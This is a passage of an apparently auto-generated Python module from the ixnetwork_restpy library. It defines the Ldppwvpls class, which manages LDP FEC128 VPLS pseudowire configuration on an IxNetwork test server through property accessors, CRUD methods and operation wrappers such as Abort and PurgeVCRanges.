INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nimport sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass Ldppwvpls(Base):\n \"\"\"LDP FEC128 Configuration\n The Ldppwvpls class encapsulates a list of ldppwvpls resources that are managed by the user.\n A list of resources can be retrieved from the server using the Ldppwvpls.find() method.\n The list can be managed by using the Ldppwvpls.add() and Ldppwvpls.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"ldppwvpls\"\n _SDM_ATT_MAP = {\n \"Active\": \"active\",\n \"AutoPeerID\": \"autoPeerID\",\n \"AutoPeerId\": \"autoPeerId\",\n \"BfdPwCV\": \"bfdPwCV\",\n \"BfdUdpCV\": \"bfdUdpCV\",\n \"CBitEnabled\": \"cBitEnabled\",\n \"ConnectedVia\": \"connectedVia\",\n \"Count\": \"count\",\n \"DescEnabled\": \"descEnabled\",\n \"Description\": \"description\",\n \"DescriptiveName\": \"descriptiveName\",\n \"DownInterval\": \"downInterval\",\n \"DownStart\": \"downStart\",\n \"EnableCCCVNegotiation\": \"enableCCCVNegotiation\",\n \"EnablePWStatus\": \"enablePWStatus\",\n \"Errors\": \"errors\",\n \"GroupId\": \"groupId\",\n \"InterfaceType\": \"interfaceType\",\n \"Ipv6PeerId\": \"ipv6PeerId\",\n \"LSPPingCV\": \"lSPPingCV\",\n \"Label\": \"label\",\n \"LocalRouterID\": \"localRouterID\",\n \"Mtu\": \"mtu\",\n \"Multiplier\": \"multiplier\",\n \"Name\": \"name\",\n \"PWACHCC\": \"pWACHCC\",\n \"PWStatusCode\": \"pWStatusCode\",\n \"PeerId\": \"peerId\",\n \"PwStatusSendNotification\": \"pwStatusSendNotification\",\n \"RepeatCount\": \"repeatCount\",\n \"RouterAlertCC\": \"routerAlertCC\",\n \"SessionStatus\": \"sessionStatus\",\n \"StackedLayers\": \"stackedLayers\",\n \"StateCounts\": \"stateCounts\",\n \"Status\": \"status\",\n \"UpInterval\": \"upInterval\",\n \"VCIDStart\": \"vCIDStart\",\n }\n _SDM_ENUM_MAP = {\n \"status\": [\n \"configured\",\n \"error\",\n \"mixed\",\n \"notStarted\",\n \"started\",\n \"starting\",\n \"stopping\",\n ],\n }\n\n def __init__(self, parent, list_op=False):\n super(Ldppwvpls, self).__init__(parent, list_op)\n\n @property\n def Connector(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import (\n Connector,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Connector\", None) is not None:\n return self._properties.get(\"Connector\")\n return Connector(self)\n\n @property\n def Ethernet(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ethernet_18677f1f170027c217563a3250b1f635.Ethernet): An instance of the Ethernet class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ethernet_18677f1f170027c217563a3250b1f635 import (\n Ethernet,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ethernet\", None) is not None:\n return self._properties.get(\"Ethernet\")\n return Ethernet(self)\n\n @property\n def Ipv4Loopback(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv4loopback_f84286c6e2c90f5267670278dde3f258.Ipv4Loopback): An instance of the Ipv4Loopback class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv4loopback_f84286c6e2c90f5267670278dde3f258 import (\n Ipv4Loopback,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ipv4Loopback\", None) is not None:\n return self._properties.get(\"Ipv4Loopback\")\n return Ipv4Loopback(self)\n\n @property\n def Ipv6Loopback(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv6loopback_c5557054afff2b9cc84b7676de50b805.Ipv6Loopback): An instance of the Ipv6Loopback class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv6loopback_c5557054afff2b9cc84b7676de50b805 import (\n Ipv6Loopback,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ipv6Loopback\", None) is not None:\n return self._properties.get(\"Ipv6Loopback\")\n return Ipv6Loopback(self)\n\n @property\n def LdpBasicRouter(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouter_53e2de40003674322c811a1ba519dbb6.LdpBasicRouter): An instance of the LdpBasicRouter class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouter_53e2de40003674322c811a1ba519dbb6 import (\n LdpBasicRouter,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpBasicRouter\", None) is not None:\n return self._properties.get(\"LdpBasicRouter\")\n return LdpBasicRouter(self)\n\n @property\n def LdpBasicRouterV6(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouterv6_b554f464616f39033d7acad4846e556c.LdpBasicRouterV6): An instance of the LdpBasicRouterV6 class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouterv6_b554f464616f39033d7acad4846e556c import (\n LdpBasicRouterV6,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpBasicRouterV6\", None) is not None:\n return self._properties.get(\"LdpBasicRouterV6\")\n return LdpBasicRouterV6(self)\n\n @property\n def LdpTargetedRouter(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouter_85c7a9993d80996c22a9dbd739df9692.LdpTargetedRouter): An instance of the LdpTargetedRouter class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouter_85c7a9993d80996c22a9dbd739df9692 import (\n LdpTargetedRouter,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpTargetedRouter\", None) is not None:\n return self._properties.get(\"LdpTargetedRouter\")\n return LdpTargetedRouter(self)\n\n @property\n def LdpTargetedRouterV6(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouterv6_e86e77f17dfccefac9e15769756089cf.LdpTargetedRouterV6): An instance of the LdpTargetedRouterV6 class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouterv6_e86e77f17dfccefac9e15769756089cf import (\n LdpTargetedRouterV6,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpTargetedRouterV6\", None) is not None:\n return self._properties.get(\"LdpTargetedRouterV6\")\n return LdpTargetedRouterV6(self)\n\n @property\n def Mpls(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.mpls_ffaab24246ff53741a201b0a48e8e3f1.Mpls): An instance of the Mpls class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.mpls_ffaab24246ff53741a201b0a48e8e3f1 import (\n Mpls,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Mpls\", None) is not None:\n return self._properties.get(\"Mpls\")\n return Mpls(self)\n\n @property\n def Tag(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d.Tag): An instance of the Tag class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d import (\n Tag,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Tag\", None) is not None:\n return self._properties.get(\"Tag\")\n return Tag(self)\n\n @property\n def Active(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Active\"]))\n\n @property\n def AutoPeerID(self):\n # type: () -> 'Multivalue'\n \"\"\"DEPRECATED\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"AutoPeerID\"]))\n\n @property\n def AutoPeerId(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"AutoPeerId\"])\n\n @AutoPeerId.setter\n def AutoPeerId(self, value):\n # type: (bool) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"AutoPeerId\"], value)\n\n @property\n def BfdPwCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): BFD PW-ACH CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"BfdPwCV\"]))\n\n @property\n def BfdUdpCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): BFD IP/UDP CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"BfdUdpCV\"]))\n\n @property\n def CBitEnabled(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, sets the C-Bit (flag). It is the highest order bit in the VC Type field. If the bit is set, it indicates the presence of a control word on this VC.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"CBitEnabled\"]))\n\n @property\n def ConnectedVia(self):\n # type: () -> List[str]\n \"\"\"DEPRECATED\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of layers this layer is used to connect with to the wire.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"])\n\n @ConnectedVia.setter\n def ConnectedVia(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"], value)\n\n @property\n def Count(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Count\"])\n\n @property\n def DescEnabled(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, indicates that an optional Interface Description is present\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DescEnabled\"]))\n\n @property\n def Description(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): An optional user-defined Interface Description. It may be used with ALL VC types. Valid length is 0 to 80 octets\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Description\"]))\n\n @property\n def DescriptiveName(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"DescriptiveName\"])\n\n @property\n def DownInterval(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Time interval for which the PW status will remain down\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DownInterval\"]))\n\n @property\n def DownStart(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The duration in time after session becomes up and a notification message being sent to make the session down\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DownStart\"]))\n\n @property\n def EnableCCCVNegotiation(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, indicates that CCCV Negotiation is enabled\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EnableCCCVNegotiation\"])\n )\n\n @property\n def EnablePWStatus(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, this enables the use of PW Status TLV in notification messages to notify the PW status\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EnablePWStatus\"])\n )\n\n @property\n def Errors(self):\n \"\"\"\n Returns\n -------\n - list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str])): A list of errors that have occurred\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Errors\"])\n\n @property\n def GroupId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): A user-defined 32-bit value used to identify a group of VCs\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"GroupId\"]))\n\n @property\n def InterfaceType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 15-bit VC Type used in the VC FEC element.It depends on the Layer 2 protocol used on the interface\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"InterfaceType\"]))\n\n @property\n def Ipv6PeerId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 128-bit IPv6 address of the LDP Peer.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Ipv6PeerId\"]))\n\n @property\n def LSPPingCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): LSP Ping CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"LSPPingCV\"]))\n\n @property\n def Label(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Label\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Label\"]))\n\n @property\n def LocalRouterID(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str): Router ID\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LocalRouterID\"])\n\n @property\n def Mtu(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 2-octet value for the maximum Transmission Unit (MTU).\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Mtu\"]))\n\n @property\n def Multiplier(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of layer instances per parent instance (multiplier)\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Multiplier\"])\n\n @Multiplier.setter\n def Multiplier(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Multiplier\"], value)\n\n @property\n def Name(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Name of NGPF element, guaranteed to be unique in Scenario\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Name\"])\n\n @Name.setter\n def Name(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Name\"], value)\n\n @property\n def PWACHCC(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): PW-ACH CC\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PWACHCC\"]))\n\n @property\n def PWStatusCode(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): PW Status Code to be sent when to transition to down state if PW Status Send Notification is enabled\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PWStatusCode\"]))\n\n @property\n def PeerId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 32-bit IPv4 address of the LDP Peer.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PeerId\"]))\n\n @property\n def PwStatusSendNotification(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, it signifies whether to send a notification message with a PW status for the corresponding PW\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"PwStatusSendNotification\"])\n )\n\n @property\n def RepeatCount(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The number of times to repeat the Up/Down status of the PW. '0' means keep toggling the Up/Down state indefinitely.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RepeatCount\"]))\n\n @property\n def RouterAlertCC(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Router Alert CC\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RouterAlertCC\"]))\n\n @property\n def SessionStatus(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"SessionStatus\"])\n\n @property\n def StackedLayers(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of secondary (many to one) child layer protocols\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"StackedLayers\"])\n\n @StackedLayers.setter\n def StackedLayers(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"StackedLayers\"], value)\n\n @property\n def StateCounts(self):\n \"\"\"\n Returns\n -------\n - dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"StateCounts\"])\n\n @property\n def Status(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Status\"])\n\n @property\n def UpInterval(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Time Interval for which the PW status will remain in Up state before transitioning again to Down state.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"UpInterval\"]))\n\n @property\n def VCIDStart(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The value of the VC ID\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"VCIDStart\"]))\n\n def update(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Multiplier=None,\n Name=None,\n StackedLayers=None,\n ):\n # type: (bool, List[str], int, str, List[str]) -> Ldppwvpls\n \"\"\"Updates ldppwvpls resource on the server.\n\n This method has some named parameters with a type: obj (Multivalue).\n The Multivalue class has documentation that details the possible values for those named parameters.\n\n Args\n ----\n - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Multiplier=None,\n Name=None,\n StackedLayers=None,\n ):\n # type: (bool, List[str], int, str, List[str]) -> Ldppwvpls\n \"\"\"Adds a new ldppwvpls resource on the server and adds it to the container.\n\n Args\n ----\n - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Returns\n -------\n - self: This instance with all currently retrieved ldppwvpls resources using find and the newly added ldppwvpls resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained ldppwvpls resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Count=None,\n DescriptiveName=None,\n Errors=None,\n LocalRouterID=None,\n Multiplier=None,\n Name=None,\n SessionStatus=None,\n StackedLayers=None,\n StateCounts=None,\n Status=None,\n ):\n \"\"\"Finds and retrieves ldppwvpls resources from the server.\n\n All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ldppwvpls resources from the server.\n To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n By default the find method takes no parameters and will retrieve all ldppwvpls resources from the server.\n\n Args\n ----\n - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str]))): A list of errors that have occurred\n - LocalRouterID (list(str)): Router ID\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.\n\n Returns\n -------\n - self: This instance with matching ldppwvpls resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of ldppwvpls data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the ldppwvpls resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n\n def Abort(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the abort operation on the server.\n\n Abort CPF control plane (equals to demote to kUnconfigured state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n abort(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"abort\", payload=payload, response_object=None)\n\n def PurgeVCRanges(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the purgeVCRanges operation on the server.\n\n Purge VC Ranges\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n purgeVCRanges(async_operation=bool)\n -----------------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVCRanges(SessionIndices=list, async_operation=bool)\n --------------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVCRanges(SessionIndices=string, async_operation=bool)\n ----------------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"purgeVCRanges\", payload=payload, response_object=None)\n\n def Purgevcranges(self, *args, **kwargs):\n # type: (*Any, **Any) -> Union[List[str], None]\n \"\"\"Executes the purgevcranges operation on the server.\n\n Purge Ethernet VC. Sends Address Withdraw message to purge all MACs learnt for this VC. Applicable for Ethernet Type VC only ( not VLAN).\n\n purgevcranges(Arg2=list, async_operation=bool)list\n --------------------------------------------------\n - Arg2 (list(number)): Purge VC Ranges.\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n - Returns list(str): ID to associate each async action invocation\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - 